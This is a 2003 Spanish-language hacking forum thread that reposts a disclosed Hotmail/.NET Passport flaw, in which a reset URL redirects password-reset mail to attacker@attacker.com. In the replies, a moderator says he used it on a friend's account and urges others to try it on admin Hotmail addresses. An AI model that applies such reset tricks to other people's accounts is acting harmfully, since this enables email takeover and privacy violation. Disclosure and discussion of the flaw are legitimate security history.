Página 1 de 2 12 ÚltimoÚltimo
Resultados 1 al 20 de 29

Tema: Ultimo Bug Publicado Para Vulnerar Una Cuenta De Hotmail

  1. #1 Ultimo Bug Publicado Para Vulnerar Una Cuenta De Hotmail 
    Moderador HH
    Fecha de ingreso
    Apr 2002
    Ubicación
    En el Kernel
    Mensajes
    672
    Descargas
    0
    Uploads
    0
    ¿Tienes una cuenta de Hotmail? Pues prepárate, porque la privacidad de tu cuenta de correo está en entredicho. Muhammad Faisal Rauf Dank, uno de los operadores de la conocida web Zone-H.org, en Pakistan, ha descubierto un agujero de seguridad que traerá de cabeza a los usuarios de Hotmail. Este es el mensaje original que Muhammad Faisal Rauf Danka envió a la hora de reportar este bug:


    -----Original Message-----

    From: Muhammad Faisal Rauf Danka [mailto:mfrd@attitudex.com] Sent: Thursday, May 08, 2003 8:46 AM To: admin@zone-h.org Subject: Hotmail & Passport (.NET Accounts) Vulnerability

    There is a very serious and stupid vulnerability or badcoding in Hotmail / Passport’s (.NET Accounts)

    I tried sending emails several times to Hotmail / Passport contact addresses, but always met with the NLP bots.

    I guess I don’t need to go in details of how cruical and important Hotmail / Passport’s .NET Account passport is to anyone.

    You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not.

    It is so simple that it is funny.

    All you got to do is hit the following in your browser:

    https://register.passport.net/emailp...cker.com&rst=1

    And you’ll get an email on attacker@attacker.com asking you to click on a url something like this:

    http://register.passport.net/EmailPa...LNum=0&lc=1033

    From that url, you can reset the password and I don’t think I need to say anything more about it.

    Vulnerability / Flaw discovered : 12th April 2003 Vendor / Owner notified : Yes (as far as emailing them more than 10 times is concerned)

    Regards -------- Muhammad Faisal Rauf Danka

    Se entiende por sí solo. Sin comentarios.

    No vamos a dar los detalles, porque la privacidad del correo es esencial para cualquier hacker que se precie, pero salta a la vista lo que hay que hacer para obtener un enlace con el que borrar las contraseñas de una víctima asaltada bajo este método.

    Muhammad Faisal Rauf Danka escribió más de 10 correos electrónicos a Microsoft reportando este fallo, sin que estos le prestaran la más mínima atención. Ahora no les queda más remedio que hacerlo ante la opinión pública.
    #ﺄתּ©ﺈﻥdз <rﻩﻩt.ﮔ>
    Citar  
     

  2. #2  
    Administrador Foros HH
    Fecha de ingreso
    Mar 2002
    Ubicación
    Cambiando pañales!!
    Mensajes
    3.051
    Descargas
    5
    Uploads
    0
    Interesante, pero seguro que ya no funciona, lo voy a probar
    Citar  
     

  3. #3  
    Avanzado
    Fecha de ingreso
    Jan 2002
    Mensajes
    779
    Descargas
    0
    Uploads
    0
    No estoy seguro de que funcione, pero puede ser la ostia... joder,joder
    Citar  
     

  4. #4  
    Avanzado
    Fecha de ingreso
    Jan 2002
    Mensajes
    779
    Descargas
    0
    Uploads
    0
    En mis manos no funciona... seguire mirando por si se me escapa algo pero en principio no funciona tal y como esta descrita
    Citar  
     

  5. #5  
    Medio
    Fecha de ingreso
    Oct 2002
    Ubicación
    jolibud
    Mensajes
    53
    Descargas
    0
    Uploads
    0
    y creo que no va a funcionar, porque según esto,

    http://www.hackhispano.com/foro/show...&threadid=7154

    ya está arreglado ese bug.

    creo que nuestros cuates que quieran obtener un password de hotmail, se van a quedar igual

    saludos
    Citar  
     

  6. #6  
    Avanzado
    Fecha de ingreso
    Jan 2002
    Mensajes
    779
    Descargas
    0
    Uploads
    0
    :-(( por unos momentos me habia sentido como un autentico juanker... reseteando passwds de hotmail
    Citar  
     

  7. #7  
    Moderador HH
    Fecha de ingreso
    Apr 2002
    Ubicación
    En el Kernel
    Mensajes
    672
    Descargas
    0
    Uploads
    0
    Ami me llego a funcionar, cuando lo probé. Me resetee mi propia cuenta desde el otro pc que tengo otra cuanta passport. Incluso me ha llegado el mail y todo.

    Hello xxxxxxx@hotmail.com:

    You asked Microsoft® .NET Passport to help you reset your password. Please follow the
    instructions in this message to complete the process.

    TO RESET YOUR PASSWORD, click this link to create your new password at the .NET Passport Web
    site:
    http://register.passport.net/EmailPage.srf?EmailID=F542C191F64F2679&URLNum=0&lc =1033
    AOL users: <a
    href=http://register.passport.net/EmailPage.srf?EmailID=F542C191F64F2679&URLNum=0&lc =1033>Click
    here to reset your password</a>

    IF YOU DID NOT REQUEST THAT .NET PASSPORT HELP YOU RESET YOUR PASSWORD...

    Please click the following link to cancel this request:
    http://register.passport.net/EmailPage.srf?EmailID=F542C191F64F2679&URLNum=1&lc =1033
    AOL users: <a
    href=http://register.passport.net/EmailPage.srf?EmailID=F542C191F64F2679&URLNum=1&lc =1033>Click
    here to cancel</a>

    IF CLICKING A LINK DOESN'T WORK...

    Copy it, and then paste it into your Web browser's address bar.
    Select the entire link (which starts with http:// and may include more than one line) and then
    copy it, usually by clicking the "Edit" menu item and then clicking "Copy". Next, open your Web
    browser and click in the box where you usually see the Web page address. Paste the link into
    this box (usually by clicking "Paste" in the "Edit" menu) and click "Go" or "Enter".

    For additional help, click the following link to contact .NET Passport Customer Support:
    http://register.passport.net/contactus.srf?LC=1033.

    Thank you,
    NET Passport Customer Support


    Please do not reply to this message; it was sent from an unmonitored e-mail address and we are
    unable to respond to any replies.

    ------------------------------------------------------------------------------------
    Kif0 xD Con la tuya tb lo probe xDDDDDDDDDDDDDDDDDDDDDDDDD
    #ﺄתּ©ﺈﻥdз <rﻩﻩt.ﮔ>
    Citar  
     

  8. #8  
    Ex-moderador
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    1.230
    Descargas
    0
    Uploads
    0
    en este foro la cuestión es putear o timar al Kifo
    Citar  
     

  9. #9  
    Moderador HH
    Fecha de ingreso
    Apr 2002
    Ubicación
    En el Kernel
    Mensajes
    672
    Descargas
    0
    Uploads
    0
    No hombre THE_CROW :P Lo hago pq con Kif0 tengo muxa confi xDD Por cierto, solo lo pude hacer una vez, ya que solo me llego el mail la primera vez dehacerlo, después ya no llego ningun mas.. osea que Kif0 se salvo por los pelos xDDDD

    También se tenias un poco mas de cabeza, en vez de poner a sacar cuentas a la gente, podias probar de resetar el password de ADMIN@hotmail.com hotmail@hotmail.com, etc,etc yo los envié y el request me lo hizo genial, solo que no llegaron los mails xD Solo el primero :P
    #ﺄתּ©ﺈﻥdз <rﻩﻩt.ﮔ>
    Citar  
     

  10. #10  
    Ex-moderador
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    1.230
    Descargas
    0
    Uploads
    0
    llega a salirte y compartes celda con mitnick (ahora q esta en la calle no)
    Citar  
     

  11. #11  
    Ex-moderador
    Fecha de ingreso
    Dec 2001
    Ubicación
    BARNA-CITY
    Mensajes
    1.134
    Descargas
    0
    Uploads
    0
    |Root|, mis puertos estan abiertos y receptivos para ti. :**
    ╟ΚιŦΦ╢
    Citar  
     

  12. #12  
    Ex-moderador
    Fecha de ingreso
    Apr 2002
    Mensajes
    3.184
    Descargas
    0
    Uploads
    0
    en este foro la cuestión es putear o timar al Kifo
    Sin olvidar a la novia de KiFo, que hace tiempo que no la mencionamos. xD

    TseTse
    ' La corrupción, el síntoma más infalible de la libertad que otorga la Constitución '
    Citar  
     

  13. #13  
    Avanzado
    Fecha de ingreso
    Jan 2003
    Ubicación
    Right Behind You
    Mensajes
    502
    Descargas
    0
    Uploads
    0
    Es broma o la traen contra Kifo??? porque a mi me cae bien, no sean tan pesados con él

    Thanx
    §§§Lagarto§§§
    Una cosa no es justa por el hecho de ser ley. Debe ser ley porque es justa.

    - Montesquieu
    Citar  
     

  14. #14  
    Ex-moderador
    Fecha de ingreso
    Apr 2002
    Mensajes
    3.184
    Descargas
    0
    Uploads
    0
    Uff a KiFo lo odiamos a muerte, desde que no comparte a su parienta con nosotros, ha perdio mucho xDDD

    KiFilloo!! :P

    TseTse
    ' La corrupción, el síntoma más infalible de la libertad que otorga la Constitución '
    Citar  
     

  15. #15  
    Avanzado
    Fecha de ingreso
    Dec 2001
    Ubicación
    sevilla
    Mensajes
    268
    Descargas
    0
    Uploads
    0
    j0asja0sa0js ke ios de putas porresiyo er shavá KIFO si kieres te ayudo a pegarle un navahazo a to dios x"DD
    Citar  
     

  16. #16  
    Administrador Foros HH
    Fecha de ingreso
    Mar 2002
    Ubicación
    Cambiando pañales!!
    Mensajes
    3.051
    Descargas
    5
    Uploads
    0
    Juas, nadie dice nada de Kifo, sino de la novia de Kifo, a la cual conocemos muy bien TseTse y yo
    Citar  
     

  17. #17  
    Moderador HH
    Fecha de ingreso
    Apr 2002
    Ubicación
    En el Kernel
    Mensajes
    672
    Descargas
    0
    Uploads
    0
    xDDDDDDDDDDDD Tas todos en la parrisima xD
    #ﺄתּ©ﺈﻥdз <rﻩﻩt.ﮔ>
    Citar  
     

  18. #18  
    Avanzado
    Fecha de ingreso
    Dec 2001
    Ubicación
    sevilla
    Mensajes
    268
    Descargas
    0
    Uploads
    0
    joe ioss dejad alas parientas ke me cargo a kien sea ke tg komplejo de rambo x"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DD
    Citar  
     

  19. #19  
    Ex-moderador
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    1.230
    Descargas
    0
    Uploads
    0
    jiji cuando vea esto Kifo se va casa x casa a meternos a leches xD
    Citar  
     

  20. #20  
    Moderador HH
    Fecha de ingreso
    Apr 2002
    Ubicación
    En el Kernel
    Mensajes
    672
    Descargas
    0
    Uploads
    0
    Pos tonces yo soy el primero xD Pq toy vivo al lao suyo xDDD
    #ﺄתּ©ﺈﻥdз <rﻩﻩt.ﮔ>
    Citar  
     

Temas similares

  1. Cuenta de hotmail bloquiada
    Por la_yuka en el foro WINDOWS
    Respuestas: 1
    Último mensaje: 10-04-2011, 23:55
  2. problema con abrir hotmail (cuenta)
    Por DeKsToR en el foro MALWARE
    Respuestas: 29
    Último mensaje: 11-05-2008, 03:30
  3. Cuenta Hotmail nuevamente
    Por dani en el foro GENERAL
    Respuestas: 2
    Último mensaje: 23-12-2004, 13:25
  4. Como recupero mi cuenta de Hotmail?
    Por qo00 en el foro INGENIERIA INVERSA
    Respuestas: 7
    Último mensaje: 25-11-2004, 21:54
  5. Problema cuenta hotmail
    Por Marchi en el foro OFF-TOPIC
    Respuestas: 4
    Último mensaje: 10-10-2004, 04:45

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •